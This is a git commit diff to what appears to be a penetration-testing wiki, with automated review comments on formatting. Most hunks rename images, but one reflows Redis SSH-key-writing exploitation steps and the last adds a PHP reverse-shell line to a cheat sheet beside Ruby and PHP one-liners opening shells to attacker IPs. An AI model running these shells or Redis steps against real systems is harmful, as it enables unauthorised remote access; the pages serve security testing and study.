GitBook: [master] 5 pages and 12 assets modified

This commit is contained in:
CPol 2021-09-02 21:18:04 +00:00 committed by gitbook-bot
parent 2e4e5ffa55
commit 7aaa6bac6d
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
11 changed files with 5 additions and 5 deletions

View file

@ -58,7 +58,7 @@ This tool is also useful to get **other information analysed** from the packets
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **\(It works in Windows\)**.
This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.
![](../../../.gitbook/assets/image%20%28567%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%281%29.png)
### [BruteShark](https://github.com/odedshimon/BruteShark)
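Review bot: the image reference just above the BruteShark heading keeps an empty alt text (`![]`), and its path changes from `image (567) (1).png` to `image (567) (1) (1).png`, an auto-generated name that only gains another `(1)` suffix. Consider giving the asset a descriptive file name and filling in the alt text so the link stays stable and the page still reads without the image.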

View file

@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate \(from APNS\)**
* **Certificate chain** includes expired **Apple iPhone Device CA**
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29.png)
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29.png)
### Step 6: Profile Installation

View file

@ -129,8 +129,7 @@ OK
### SSH
Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis.
In the output of **`config get dir`** you could find the **home** of the **redis user** \(usually _/var/lib/redis_ or _/home/redis/.ssh_\), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it:
Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. In the output of **`config get dir`** you could find the **home** of the **redis user** \(usually _/var/lib/redis_ or _/home/redis/.ssh_\), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it:
1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`**
2. Write the public key to a file : **`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`**
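Review bot: in the SSH section the `config get dir` ordering caveat and the explanation of its output are joined into one long paragraph, so the caveat ("Suggest to run it first right after login into Redis") no longer stands out. Keep it as its own paragraph or a hint block, and tidy the wording while the line is being touched, for example "manually exploit commands" and "Suggest to run it first".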

View file

@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
If you see an error like the following one:
![](../../.gitbook/assets/image%20%28446%29%20%281%29%20%282%29%20%282%29%20%283%29%20%283%29.png)
![](../../.gitbook/assets/image%20%28446%29%20%281%29%20%282%29%20%282%29%20%283%29%20%283%29%20%282%29.png)
It means that the server **didn't receive the correct domain name** inside the Host header.
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
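Review bot: the sentence "If you see an error like the following one:" depends entirely on the image, which has empty alt text and whose path is the only thing that changes in this hunk. Quote the error text in the page alongside the image so the section is searchable and still makes sense if the asset link breaks.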

View file

@ -103,6 +103,7 @@ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.
```bash
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
```
## Java
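Review bot: the `<?php exec(...) ?>` line sits inside the bash code fence, but it is PHP file content rather than a shell one-liner like the `php -r` line above it, so it belongs in its own fence tagged `php`. It also hard-codes `10.10.14.8` and `4444` while the line above uses `10.0.0.1` and `1234` and the Ruby entry uses `[IPADDR]` and `[PORT]`; pick one placeholder convention for the page.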